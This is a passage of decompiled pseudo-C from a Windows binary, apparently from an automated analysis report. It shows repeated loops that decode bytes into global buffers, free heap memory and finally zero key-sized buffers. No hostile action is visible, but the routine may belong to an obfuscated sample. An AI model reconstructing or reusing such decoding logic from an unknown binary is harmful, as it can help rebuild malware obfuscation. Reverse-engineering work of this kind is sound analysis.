				if ( *(_t3601 + 0x98) == 0) goto 0xf3047d2e;
				HeapFree(??, ??, ??);
				 *((long long*)(_t3601 + 0x2b0)) =  *((intOrPtr*)(_t3601 + 0x180));
				asm("movaps xmm0, [esp+0x170]");
				asm("inc ecx");
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x620));
				_t3474 = _t3601 + 0xe0;
				E000007FE7FEF3041208(__esp,  *((intOrPtr*)(_t3601 + 0x620)), _t3474, _t3601 + 0x360, _t3601 + 0x2a0,  *((intOrPtr*)(_t3601 + 0x610)));
				_t2851 =  *_t3474;
				_t2057 = _t2851;
				 *((char*)(_t3601 + 0x34)) = _t2057 == 0;
				if (_t2057 == 0) goto 0xf304a218;
				 *((long long*)(_t3601 + 0x4a0)) =  *((intOrPtr*)(_t3601 + 0xe8));
				_t3359 =  *((intOrPtr*)(_t3601 + 0xf0));
				 *(_t3601 + 0x338) = _t2851;
				if (_t3359 == 0) goto 0xf3047e09;
				_t3225 =  *0xf319c0b8; // 0xb
				bpl =  *((intOrPtr*)(_t2851 + _t2636));
				_t2059 = _t3225 -  *0xf319c0b0; // 0x10
				if (_t2059 != 0) goto 0xf3047de5;
				E000007FE7FEF306953C(_t2059, 0xf319c0a8, _t3225);
				_t3226 =  *0xf319c0b8; // 0xb
				_t2486 =  *0xf319c0a8; // 0x3356d0
				 *((intOrPtr*)(_t2486 + _t3226)) = bpl;
				_t3227 =  *0xf319c0b8; // 0xb
				 *0xf319c0b8 = _t3227 + 1;
				_t2637 = _t2636 + 1;
				if (_t3359 != _t2637) goto 0xf3047dc1;
				_t3229 = _t3601 + 0x1a0;
				 *_t3229 =  *((intOrPtr*)(_t3601 + 0x548));
				 *((long long*)(_t3229 + 8)) =  *((intOrPtr*)(_t3601 + 0x5a0));
				 *((long long*)(_t3229 + 0x10)) = 0x24;
				E000007FE7FEF304329C();
				if ( *(_t3601 + 0x90) == 0) goto 0xf304aae4;
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x70));
				E000007FE7FEF304AC72( *((intOrPtr*)(_t3601 + 0x70)), _t3601 + 0x758,  *(_t3601 + 0x90),  *(_t3601 + 0xa0),  *((intOrPtr*)(_t3601 + 0x60)));
				if ( *(_t3601 + 0x98) == 0) goto 0xf3047e92;
				HeapFree(??, ??, ??);
				 *((long long*)(_t3601 + 0x2b0)) =  *((intOrPtr*)(_t3601 + 0x180));
				asm("movaps xmm0, [esp+0x170]");
				asm("inc ecx");
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x768));
				_t3478 = _t3601 + 0xe0;
				E000007FE7FEF3041208(_t1979,  *((intOrPtr*)(_t3601 + 0x768)), _t3478, _t3601 + 0x360, _t3601 + 0x2a0,  *((intOrPtr*)(_t3601 + 0x758)));
				_t2858 =  *_t3478;
				_t2063 = _t2858;
				 *(_t3601 + 0x118) = _t2063 == 0;
				if (_t2063 == 0) goto 0xf304a2de;
				 *((long long*)(_t3601 + 0x498)) =  *((intOrPtr*)(_t3601 + 0xe8));
				_t3361 =  *((intOrPtr*)(_t3601 + 0xf0));
				 *(_t3601 + 0x330) = _t2858;
				if (_t3361 == 0) goto 0xf3047f70;
				_t3232 =  *0xf319c0d0; // 0xa
				bpl =  *((intOrPtr*)(_t2858 + _t2637));
				_t2065 = _t3232 -  *0xf319c0c8; // 0x10
				if (_t2065 != 0) goto 0xf3047f4c;
				E000007FE7FEF306953C(_t2065, 0xf319c0c0, _t3232);
				_t3233 =  *0xf319c0d0; // 0xa
				_t2493 =  *0xf319c0c0; // 0x3356f0
				 *((intOrPtr*)(_t2493 + _t3233)) = bpl;
				_t3234 =  *0xf319c0d0; // 0xa
				 *0xf319c0d0 = _t3234 + 1;
				_t2638 = _t2637 + 1;
				if (_t3361 != _t2638) goto 0xf3047f28;
				_t3236 = _t3601 + 0x1a0;
				 *_t3236 =  *((intOrPtr*)(_t3601 + 0x528));
				 *((long long*)(_t3236 + 8)) =  *((intOrPtr*)(_t3601 + 0x590));
				 *((long long*)(_t3236 + 0x10)) = 0x24;
				E000007FE7FEF304329C();
				if ( *(_t3601 + 0x90) == 0) goto 0xf304ab04;
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x70));
				E000007FE7FEF304AC72( *((intOrPtr*)(_t3601 + 0x70)), _t3601 + 0x780,  *(_t3601 + 0x90),  *(_t3601 + 0xa0),  *((intOrPtr*)(_t3601 + 0x60)));
				if ( *(_t3601 + 0x98) == 0) goto 0xf3047ff9;
				HeapFree(??, ??, ??);
				 *((long long*)(_t3601 + 0x2b0)) =  *((intOrPtr*)(_t3601 + 0x180));
				asm("movaps xmm0, [esp+0x170]");
				asm("inc ecx");
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x790));
				_t3482 = _t3601 + 0xe0;
				_t1551 = E000007FE7FEF3041208(_t1979,  *((intOrPtr*)(_t3601 + 0x790)), _t3482, _t3601 + 0x360, _t3601 + 0x2a0,  *((intOrPtr*)(_t3601 + 0x780)));
				_t2865 =  *_t3482;
				_t2069 = _t2865;
				 *(_t3601 + 0x148) = _t1551 & 0xffffff00 | _t2069 == 0x00000000;
				if (_t2069 == 0) goto 0xf304a39c;
				 *((long long*)(_t3601 + 0x490)) =  *((intOrPtr*)(_t3601 + 0xe8));
				_t3363 =  *((intOrPtr*)(_t3601 + 0xf0));
				 *(_t3601 + 0x328) = _t2865;
				if (_t3363 == 0) goto 0xf30480d9;
				_t3239 =  *0xf319c0e8; // 0xb
				bpl =  *((intOrPtr*)(_t2865 + _t2638));
				_t2071 = _t3239 -  *0xf319c0e0; // 0x10
				if (_t2071 != 0) goto 0xf30480b5;
				E000007FE7FEF306953C(_t2071, 0xf319c0d8, _t3239);
				_t3240 =  *0xf319c0e8; // 0xb
				_t2500 =  *0xf319c0d8; // 0x335710
				 *((intOrPtr*)(_t2500 + _t3240)) = bpl;
				_t3241 =  *0xf319c0e8; // 0xb
				 *0xf319c0e8 = _t3241 + 1;
				_t2639 = _t2638 + 1;
				if (_t3363 != _t2639) goto 0xf3048091;
				_t3243 = _t3601 + 0x1a0;
				 *_t3243 =  *(_t3601 + 0x518);
				 *((long long*)(_t3243 + 8)) =  *((intOrPtr*)(_t3601 + 0x588));
				 *((long long*)(_t3243 + 0x10)) = 0x54;
				E000007FE7FEF304329C(); // executed
				if ( *(_t3601 + 0x90) == 0) goto 0xf304ab24;
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x70));
				E000007FE7FEF304AC72( *((intOrPtr*)(_t3601 + 0x70)), _t3601 + 0x6b8,  *(_t3601 + 0x90),  *(_t3601 + 0xa0),  *((intOrPtr*)(_t3601 + 0x60)));
				if ( *(_t3601 + 0x98) == 0) goto 0xf3048162;
				HeapFree(??, ??, ??);
				 *((long long*)(_t3601 + 0x2b0)) =  *((intOrPtr*)(_t3601 + 0x180));
				asm("movaps xmm0, [esp+0x170]");
				asm("inc ecx");
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x6c8));
				_t3486 = _t3601 + 0xe0;
				E000007FE7FEF3041208(_t1979,  *((intOrPtr*)(_t3601 + 0x6c8)), _t3486, _t3601 + 0x360, _t3601 + 0x2a0,  *((intOrPtr*)(_t3601 + 0x6b8)));
				_t2872 =  *_t3486;
				_t2075 = _t2872;
				 *(_t3601 + 0x110) = _t2075 == 0;
				if (_t2075 == 0) goto 0xf304a452;
				 *((long long*)(_t3601 + 0x488)) =  *((intOrPtr*)(_t3601 + 0xe8));
				_t3365 =  *((intOrPtr*)(_t3601 + 0xf0));
				 *(_t3601 + 0x320) = _t2872;
				if (_t3365 == 0) goto 0xf3048240;
				_t3246 =  *0xf319c100; // 0x2e
				bpl =  *((intOrPtr*)(_t2872 + _t2639));
				_t2077 = _t3246 -  *0xf319c0f8; // 0x40
				if (_t2077 != 0) goto 0xf304821c;
				E000007FE7FEF306953C(_t2077, 0xf319c0f0, _t3246);
				_t3247 =  *0xf319c100; // 0x2e
				_t2507 =  *0xf319c0f0; // 0x339270
				 *((intOrPtr*)(_t2507 + _t3247)) = bpl;
				_t3248 =  *0xf319c100; // 0x2e
				 *0xf319c100 = _t3248 + 1;
				_t2640 = _t2639 + 1;
				if (_t3365 != _t2640) goto 0xf30481f8;
				_t3250 = _t3601 + 0x1a0;
				 *_t3250 =  *((intOrPtr*)(_t3601 + 0x508));
				 *((long long*)(_t3250 + 8)) =  *((intOrPtr*)(_t3601 + 0x578));
				 *((long long*)(_t3250 + 0x10)) = 0x1c;
				E000007FE7FEF304329C();
				if ( *(_t3601 + 0x90) == 0) goto 0xf304ab44;
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x70));
				E000007FE7FEF304AC72( *((intOrPtr*)(_t3601 + 0x70)), _t3601 + 0x7a8,  *(_t3601 + 0x90),  *(_t3601 + 0xa0),  *((intOrPtr*)(_t3601 + 0x60)));
				if ( *(_t3601 + 0x98) == 0) goto 0xf30482c9;
				HeapFree(??, ??, ??);
				 *((long long*)(_t3601 + 0x2b0)) =  *((intOrPtr*)(_t3601 + 0x180));
				asm("movaps xmm0, [esp+0x170]");
				asm("inc ecx");
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x7b8));
				_t3490 = _t3601 + 0xe0;
				E000007FE7FEF3041208(_t1979,  *((intOrPtr*)(_t3601 + 0x7b8)), _t3490, _t3601 + 0x360, _t3601 + 0x2a0,  *((intOrPtr*)(_t3601 + 0x7a8)));
				_t2879 =  *_t3490;
				_t2081 = _t2879;
				 *(_t3601 + 0x88) = _t2081 == 0;
				if (_t2081 == 0) goto 0xf304a500;
				 *((long long*)(_t3601 + 0x480)) =  *((intOrPtr*)(_t3601 + 0xe8));
				_t3367 =  *((intOrPtr*)(_t3601 + 0xf0));
				 *(_t3601 + 0x318) = _t2879;
				if (_t3367 == 0) goto 0xf30483a7;
				_t3253 =  *0xf319c118; // 0x3
				bpl =  *((intOrPtr*)(_t2879 + _t2640));
				_t2083 = _t3253 -  *0xf319c110; // 0x8
				if (_t2083 != 0) goto 0xf3048383;
				E000007FE7FEF306953C(_t2083, 0xf319c108, _t3253);
				_t3254 =  *0xf319c118; // 0x3
				_t2514 =  *0xf319c108; // 0x346060
				 *((intOrPtr*)(_t2514 + _t3254)) = bpl;
				_t3255 =  *0xf319c118; // 0x3
				 *0xf319c118 = _t3255 + 1;
				_t2641 = _t2640 + 1;
				if (_t3367 != _t2641) goto 0xf304835f;
				_t3257 = _t3601 + 0x1a0;
				 *_t3257 =  *((intOrPtr*)(_t3601 + 0x500));
				 *((long long*)(_t3257 + 8)) =  *((intOrPtr*)(_t3601 + 0x568));
				 *((long long*)(_t3257 + 0x10)) = 0x20;
				E000007FE7FEF304329C();
				if ( *(_t3601 + 0x90) == 0) goto 0xf304ab64;
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x70));
				E000007FE7FEF304AC72( *((intOrPtr*)(_t3601 + 0x70)), _t3601 + 0x668,  *(_t3601 + 0x90),  *(_t3601 + 0xa0),  *((intOrPtr*)(_t3601 + 0x60)));
				if ( *(_t3601 + 0x98) == 0) goto 0xf3048430;
				HeapFree(??, ??, ??);
				 *((long long*)(_t3601 + 0x2b0)) =  *((intOrPtr*)(_t3601 + 0x180));
				asm("movaps xmm0, [esp+0x170]");
				asm("inc ecx");
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x678));
				_t3494 = _t3601 + 0xe0;
				E000007FE7FEF3041208(_t1979,  *((intOrPtr*)(_t3601 + 0x678)), _t3494, _t3601 + 0x360, _t3601 + 0x2a0,  *((intOrPtr*)(_t3601 + 0x668)));
				_t2886 =  *_t3494;
				_t2087 = _t2886;
				 *(_t3601 + 0x80) = _t2087 == 0;
				if (_t2087 == 0) goto 0xf304a5a6;
				 *((long long*)(_t3601 + 0x478)) =  *((intOrPtr*)(_t3601 + 0xe8));
				_t3369 =  *((intOrPtr*)(_t3601 + 0xf0));
				 *(_t3601 + 0x310) = _t2886;
				if (_t3369 == 0) goto 0xf304850e;
				_t3260 =  *0xf319c130; // 0x6
				bpl =  *((intOrPtr*)(_t2886 + _t2641));
				_t2089 = _t3260 -  *0xf319c128; // 0x8
				if (_t2089 != 0) goto 0xf30484ea;
				E000007FE7FEF306953C(_t2089, 0xf319c120, _t3260);
				_t3261 =  *0xf319c130; // 0x6
				_t2521 =  *0xf319c120; // 0x346070
				 *((intOrPtr*)(_t2521 + _t3261)) = bpl;
				_t3262 =  *0xf319c130; // 0x6
				 *0xf319c130 = _t3262 + 1;
				_t2642 = _t2641 + 1;
				if (_t3369 != _t2642) goto 0xf30484c6;
				_t3264 = _t3601 + 0x1a0;
				 *_t3264 =  *(_t3601 + 0x4f8);
				 *((long long*)(_t3264 + 8)) =  *((intOrPtr*)(_t3601 + 0x560));
				 *((long long*)(_t3264 + 0x10)) = 0x1c;
				E000007FE7FEF304329C();
				if ( *(_t3601 + 0x90) == 0) goto 0xf304ab84;
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x70));
				E000007FE7FEF304AC72( *((intOrPtr*)(_t3601 + 0x70)), _t3601 + 0x6e0,  *(_t3601 + 0x90),  *(_t3601 + 0xa0),  *((intOrPtr*)(_t3601 + 0x60)));
				if ( *(_t3601 + 0x98) == 0) goto 0xf3048597;
				HeapFree(??, ??, ??);
				 *((long long*)(_t3601 + 0x2b0)) =  *((intOrPtr*)(_t3601 + 0x180));
				asm("movaps xmm0, [esp+0x170]");
				asm("inc ecx");
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x6f0));
				_t3498 = _t3601 + 0xe0;
				E000007FE7FEF3041208(_t1979,  *((intOrPtr*)(_t3601 + 0x6f0)), _t3498, _t3601 + 0x360, _t3601 + 0x2a0,  *((intOrPtr*)(_t3601 + 0x6e0)));
				_t2893 =  *_t3498;
				_t2093 = _t2893;
				 *((char*)(_t3601 + 0x58)) = _t2093 == 0;
				if (_t2093 == 0) goto 0xf304a644;
				 *((long long*)(_t3601 + 0x470)) =  *((intOrPtr*)(_t3601 + 0xe8));
				_t3371 =  *((intOrPtr*)(_t3601 + 0xf0));
				 *(_t3601 + 0x308) = _t2893;
				if (_t3371 == 0) goto 0xf3048672;
				_t3267 =  *0xf319c148; // 0x3
				bpl =  *((intOrPtr*)(_t2893 + _t2642));
				_t2095 = _t3267 -  *0xf319c140; // 0x8
				if (_t2095 != 0) goto 0xf304864e;
				E000007FE7FEF306953C(_t2095, 0xf319c138, _t3267);
				_t3268 =  *0xf319c148; // 0x3
				_t2528 =  *0xf319c138; // 0x346080
				 *((intOrPtr*)(_t2528 + _t3268)) = bpl;
				_t3269 =  *0xf319c148; // 0x3
				 *0xf319c148 = _t3269 + 1;
				_t2643 = _t2642 + 1;
				if (_t3371 != _t2643) goto 0xf304862a;
				_t3271 = _t3601 + 0x1a0;
				 *_t3271 =  *((intOrPtr*)(_t3601 + 0x4f0));
				 *((long long*)(_t3271 + 8)) =  *((intOrPtr*)(_t3601 + 0x550));
				 *((long long*)(_t3271 + 0x10)) = 0x1c;
				E000007FE7FEF304329C();
				if ( *(_t3601 + 0x90) == 0) goto 0xf304aba4;
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x70));
				E000007FE7FEF304AC72( *((intOrPtr*)(_t3601 + 0x70)), _t3601 + 0x640,  *(_t3601 + 0x90),  *(_t3601 + 0xa0),  *((intOrPtr*)(_t3601 + 0x60)));
				if ( *(_t3601 + 0x98) == 0) goto 0xf30486fb;
				HeapFree(??, ??, ??);
				 *((long long*)(_t3601 + 0x2b0)) =  *((intOrPtr*)(_t3601 + 0x180));
				asm("movaps xmm0, [esp+0x170]");
				asm("inc ecx");
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x650));
				_t3502 = _t3601 + 0xe0;
				E000007FE7FEF3041208(_t1979,  *((intOrPtr*)(_t3601 + 0x650)), _t3502, _t3601 + 0x360, _t3601 + 0x2a0,  *((intOrPtr*)(_t3601 + 0x640)));
				_t2900 =  *_t3502;
				_t2099 = _t2900;
				 *(_t3601 + 0x50) = _t2099 == 0;
				if (_t2099 == 0) goto 0xf304a6dd;
				 *((long long*)(_t3601 + 0x468)) =  *((intOrPtr*)(_t3601 + 0xe8));
				_t3373 =  *((intOrPtr*)(_t3601 + 0xf0));
				 *(_t3601 + 0x300) = _t2900;
				if (_t3373 == 0) goto 0xf30487d6;
				_t3274 =  *0xf319c160; // 0x3
				bpl =  *((intOrPtr*)(_t2900 + _t2643));
				_t2101 = _t3274 -  *0xf319c158; // 0x8
				if (_t2101 != 0) goto 0xf30487b2;
				E000007FE7FEF306953C(_t2101, 0xf319c150, _t3274);
				_t3275 =  *0xf319c160; // 0x3
				_t2535 =  *0xf319c150; // 0x346090
				 *((intOrPtr*)(_t2535 + _t3275)) = bpl;
				_t3276 =  *0xf319c160; // 0x3
				 *0xf319c160 = _t3276 + 1;
				_t2644 = _t2643 + 1;
				if (_t3373 != _t2644) goto 0xf304878e;
				_t3278 = _t3601 + 0x1a0;
				 *_t3278 =  *((intOrPtr*)(_t3601 + 0x4e0));
				 *((long long*)(_t3278 + 8)) =  *((intOrPtr*)(_t3601 + 0x538));
				 *((long long*)(_t3278 + 0x10)) = 0x28;
				E000007FE7FEF304329C();
				if ( *(_t3601 + 0x90) == 0) goto 0xf304abc4;
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x70));
				E000007FE7FEF304AC72( *((intOrPtr*)(_t3601 + 0x70)), _t3601 + 0x7d0,  *(_t3601 + 0x90),  *(_t3601 + 0xa0),  *((intOrPtr*)(_t3601 + 0x60)));
				if ( *(_t3601 + 0x98) == 0) goto 0xf304885f;
				HeapFree(??, ??, ??);
				 *((long long*)(_t3601 + 0x2b0)) =  *((intOrPtr*)(_t3601 + 0x180));
				asm("movaps xmm0, [esp+0x170]");
				asm("inc ecx");
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x7e0));
				_t3506 = _t3601 + 0xe0;
				E000007FE7FEF3041208(_t1979,  *((intOrPtr*)(_t3601 + 0x7e0)), _t3506, _t3601 + 0x360, _t3601 + 0x2a0,  *((intOrPtr*)(_t3601 + 0x7d0)));
				_t2907 =  *_t3506;
				_t2105 = _t2907;
				 *((char*)(_t3601 + 0x33)) = _t2105 == 0;
				if (_t2105 == 0) goto 0xf304a771;
				 *((long long*)(_t3601 + 0x460)) =  *((intOrPtr*)(_t3601 + 0xe8));
				_t3375 =  *((intOrPtr*)(_t3601 + 0xf0));
				 *(_t3601 + 0x2f8) = _t2907;
				if (_t3375 == 0) goto 0xf304893a;
				_t3281 =  *0xf319c178; // 0xc
				bpl =  *((intOrPtr*)(_t2907 + _t2644));
				_t2107 = _t3281 -  *0xf319c170; // 0x10
				if (_t2107 != 0) goto 0xf3048916;
				E000007FE7FEF306953C(_t2107, 0xf319c168, _t3281);
				_t3282 =  *0xf319c178; // 0xc
				_t2542 =  *0xf319c168; // 0x335830
				 *((intOrPtr*)(_t2542 + _t3282)) = bpl;
				_t3283 =  *0xf319c178; // 0xc
				 *0xf319c178 = _t3283 + 1;
				_t2645 = _t2644 + 1;
				if (_t3375 != _t2645) goto 0xf30488f2;
				_t3285 = _t3601 + 0x1a0;
				 *_t3285 =  *((intOrPtr*)(_t3601 + 0x4d8));
				 *((long long*)(_t3285 + 8)) =  *((intOrPtr*)(_t3601 + 0x530));
				 *((long long*)(_t3285 + 0x10)) = 0x1c;
				E000007FE7FEF304329C();
				if ( *(_t3601 + 0x90) == 0) goto 0xf304abe1;
				 *((long long*)(_t3601 + 0x458)) = _t3879;
				_t3376 =  *(_t3601 + 0x98);
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x70));
				E000007FE7FEF304AC72( *((intOrPtr*)(_t3601 + 0x70)), _t3601 + 0x690,  *(_t3601 + 0x90),  *(_t3601 + 0xa0),  *((intOrPtr*)(_t3601 + 0x60)));
				if (_t3376 == 0) goto 0xf30489cb;
				HeapFree(??, ??, ??);
				 *((long long*)(_t3601 + 0x2b0)) =  *((intOrPtr*)(_t3601 + 0x180));
				asm("movaps xmm0, [esp+0x170]");
				asm("inc ecx");
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x6a0));
				_t3510 = _t3601 + 0xe0;
				_t1580 = E000007FE7FEF3041208(_t1979,  *((intOrPtr*)(_t3601 + 0x6a0)), _t3510, _t3601 + 0x360, _t3601 + 0x2a0,  *((intOrPtr*)(_t3601 + 0x690)));
				_t3880 =  *_t3510;
				_t2111 = _t3880;
				 *((char*)(_t3601 + 0x32)) = _t1580 & 0xffffff00 | _t2111 == 0x00000000;
				if (_t2111 == 0) goto 0xf304a800;
				 *((long long*)(_t3601 + 0x450)) =  *((intOrPtr*)(_t3601 + 0xe8));
				_t3511 =  *((intOrPtr*)(_t3601 + 0xf0));
				if (_t3511 == 0) goto 0xf3048a9a;
				_t2549 =  *0xf319c190; // 0x3
				_t3288 =  *0xf319c188; // 0x8
				if (_t2549 != _t3288) goto 0xf3048a7e;
				E000007FE7FEF306953C(_t2549 - _t3288, 0xf319c180, _t3288);
				_t2550 =  *0xf319c190; // 0x3
				_t2915 =  *0xf319c180; // 0x3460a0
				 *((char*)(_t2915 + _t2550)) =  *((intOrPtr*)(_t3880 + _t3376));
				 *0xf319c190 = _t2550 + 1;
				if (_t3511 != _t3376 + 1) goto 0xf3048a5f;
				_t3290 = _t3601 + 0x1a0;
				 *_t3290 =  *((intOrPtr*)(_t3601 + 0x4d0));
				 *((long long*)(_t3290 + 8)) =  *((intOrPtr*)(_t3601 + 0x520));
				 *((long long*)(_t3290 + 0x10)) = 0x48;
				E000007FE7FEF304329C();
				if ( *(_t3601 + 0x90) == 0) goto 0xf304abfe;
				 *((long long*)(_t3601 + 0x448)) = _t3889;
				_t3378 =  *(_t3601 + 0x98);
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x70));
				E000007FE7FEF304AC72( *((intOrPtr*)(_t3601 + 0x70)), _t3601 + 0x708,  *(_t3601 + 0x90),  *(_t3601 + 0xa0),  *((intOrPtr*)(_t3601 + 0x60)));
				if (_t3378 == 0) goto 0xf3048b2b;
				HeapFree(??, ??, ??);
				 *((long long*)(_t3601 + 0x2b0)) =  *((intOrPtr*)(_t3601 + 0x180));
				asm("movaps xmm0, [esp+0x170]");
				asm("inc ecx");
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x718));
				_t3514 = _t3601 + 0xe0;
				E000007FE7FEF3041208(_t1979,  *((intOrPtr*)(_t3601 + 0x718)), _t3514, _t3601 + 0x360, _t3601 + 0x2a0,  *((intOrPtr*)(_t3601 + 0x708)));
				_t3890 =  *_t3514;
				_t2117 = _t3890;
				 *((char*)(_t3601 + 0x2f)) = _t2117 == 0;
				if (_t2117 == 0) goto 0xf304a88a;
				 *((long long*)(_t3601 + 0x440)) =  *((intOrPtr*)(_t3601 + 0xe8));
				_t3515 =  *((intOrPtr*)(_t3601 + 0xf0));
				if (_t3515 == 0) goto 0xf3048bf9;
				_t2558 =  *0xf319c1a8; // 0x24
				_t3293 =  *0xf319c1a0; // 0x40
				if (_t2558 != _t3293) goto 0xf3048bdd;
				E000007FE7FEF306953C(_t2558 - _t3293, 0xf319c198, _t3293);
				_t2559 =  *0xf319c1a8; // 0x24
				_t2921 =  *0xf319c198; // 0x339040
				 *((char*)(_t2921 + _t2559)) =  *((intOrPtr*)(_t3890 + _t3378));
				 *0xf319c1a8 = _t2559 + 1;
				if (_t3515 != _t3378 + 1) goto 0xf3048bbd;
				_t3295 = _t3601 + 0x1a0;
				 *_t3295 =  *((intOrPtr*)(_t3601 + 0x4c8));
				 *((long long*)(_t3295 + 8)) =  *((intOrPtr*)(_t3601 + 0x510));
				 *((long long*)(_t3295 + 0x10)) = 0x1c;
				E000007FE7FEF304329C();
				if ( *(_t3601 + 0x90) == 0) goto 0xf304ac1b;
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x70));
				E000007FE7FEF304AC72( *((intOrPtr*)(_t3601 + 0x70)), _t3601 + 0x120,  *(_t3601 + 0x90),  *(_t3601 + 0xa0),  *((intOrPtr*)(_t3601 + 0x60)));
				if ( *(_t3601 + 0x98) == 0) goto 0xf3048c82;
				HeapFree(??, ??, ??);
				 *((long long*)(_t3601 + 0x1b0)) =  *((intOrPtr*)(_t3601 + 0x180));
				asm("movaps xmm0, [esp+0x170]");
				asm("inc ecx");
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x130));
				_t1589 = E000007FE7FEF3041208(_t1979,  *((intOrPtr*)(_t3601 + 0x130)), _t3601 + 0x90, _t3601 + 0x360, _t3601 + 0x1a0,  *((intOrPtr*)(_t3601 + 0x120)));
				_t3599 = _t3601 + 0x2a0;
				E000007FE7FEF3042FA6(_t1589, _t3599, _t3601 + 0x90);
				_t3600 =  *_t3599;
				_t2123 = _t3600;
				 *((char*)(_t3601 + 0x2d)) = _t2123 == 0;
				if (_t2123 == 0) goto 0xf30494c4;
				 *((long long*)(_t3601 + 0x438)) =  *(_t3601 + 0x2a8);
				_t3381 =  *(_t3601 + 0x2b0);
				if (_t3381 == 0) goto 0xf3048d65;
				_t2567 =  *0xf319c1c0; // 0x4
				_t3299 =  *0xf319c1b8; // 0x8
				r14b =  *((intOrPtr*)(_t3600 + _t2645));
				if (_t2567 != _t3299) goto 0xf3048d48;
				E000007FE7FEF306953C(_t2567 - _t3299, 0xf319c1b0, _t3299);
				_t2568 =  *0xf319c1c0; // 0x4
				_t2928 =  *0xf319c1b0; // 0x3460b0
				 *((intOrPtr*)(_t2928 + _t2568)) = r14b;
				 *0xf319c1c0 = _t2568 + 1;
				_t2646 = _t2645 + 1;
				if (_t3381 != _t2646) goto 0xf3048d28;
				_t3301 = _t3601 + 0x1a0;
				 *_t3301 =  *(_t3601 + 0x4c0);
				 *((long long*)(_t3301 + 8)) =  *((intOrPtr*)(_t3601 + 0x4e8));
				 *((long long*)(_t3301 + 0x10)) = 0x18;
				E000007FE7FEF304329C();
				if ( *(_t3601 + 0x90) == 0) goto 0xf304ac38;
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0x70));
				E000007FE7FEF304AC72( *((intOrPtr*)(_t3601 + 0x70)), _t3601 + 0xe0,  *(_t3601 + 0x90),  *(_t3601 + 0xa0),  *((intOrPtr*)(_t3601 + 0x60)));
				if ( *(_t3601 + 0x98) == 0) goto 0xf3048dee;
				HeapFree(??, ??, ??);
				 *((long long*)(_t3601 + 0x1b0)) =  *((intOrPtr*)(_t3601 + 0x180));
				asm("movaps xmm0, [esp+0x170]");
				asm("inc ecx");
				 *((long long*)(_t3601 + 0x20)) =  *((intOrPtr*)(_t3601 + 0xf0));
				_t1594 = E000007FE7FEF3041208(_t1979,  *((intOrPtr*)(_t3601 + 0xf0)), _t3601 + 0x90, _t3601 + 0x360, _t3601 + 0x1a0,  *((intOrPtr*)(_t3601 + 0xe0)));
				_t3522 = _t3601 + 0x2a0;
				E000007FE7FEF3042FA6(_t1594, _t3522, _t3601 + 0x90);
				_t3908 =  *_t3522;
				if (_t3908 == 0) goto 0xf30494d8;
				 *(_t3601 + 0x118) =  *(_t3601 + 0x2a8);
				_t3384 =  *(_t3601 + 0x2b0);
				if (_t3384 == 0) goto 0xf3048ecd;
				_t2576 =  *0xf319c1d8; // 0x2
				_t3305 =  *0xf319c1d0; // 0x8
				r15b =  *((intOrPtr*)(_t3908 + _t2646));
				if (_t2576 != _t3305) goto 0xf3048eb0;
				_t1596 = E000007FE7FEF306953C(_t2576 - _t3305, 0xf319c1c8, _t3305);
				_t2577 =  *0xf319c1d8; // 0x2
				_t3306 =  *0xf319c1d0; // 0x8
				_t2935 =  *0xf319c1c8; // 0x3460c0
				 *((intOrPtr*)(_t2935 + _t2577)) = r15b;
				_t2578 = _t2577 + 1;
				 *0xf319c1d8 = _t2578;
				if (_t3384 != _t2646 + 1) goto 0xf3048e91;
				E000007FE7FEF30C6D3D(E000007FE7FEF30C6D3D(E000007FE7FEF30C6D3D(_t1596, _t3601 + 0x60, _t3306), _t3601 + 0x3b0, _t3306), _t3601 + 0x3f0, _t3306);
				 *((char*)(_t3601 + _t2578 + 0x410)) = 0;
				_t2579 = _t2578 + 1;
				if (_t2579 != 0x20) goto 0xf3048ef3;
				 *((char*)(_t3601 + _t2579 + 0x170)) = 0;
				_t2580 = _t2579 + 1;
				if (_t2580 != 0x18) goto 0xf3048f06;
				 *((char*)(_t3601 + _t2580 + 0x870)) = 0;
				_t2581 = _t2580 + 1;
				if (_t2581 != 0x20) goto 0xf3048f19;
				 *((char*)(_t3601 + _t2581 + 0x150)) = 0;
				_t2582 = _t2581 + 1;
				if (_t2582 != 0x20) goto 0xf3048f2c;
				if ( *(_t3601 + 0x118) == 0) goto 0xf3048f5a;
				HeapFree(??, ??, ??);
				if ( *((long long*)(_t3601 + 0xe8)) == 0) goto 0xf3048f7c;
				HeapFree(??, ??, ??);
				if ( *((long long*)(_t3601 + 0x438)) == 0) goto 0xf3048f99;
				HeapFree(??, ??, ??);
				if ( *((long long*)(_t3601 + 0x128)) == 0) goto 0xf3048fbb;
				HeapFree(??, ??, ??);
				if ( *((long long*)(_t3601 + 0x440)) == 0) goto 0xf3048fd8;
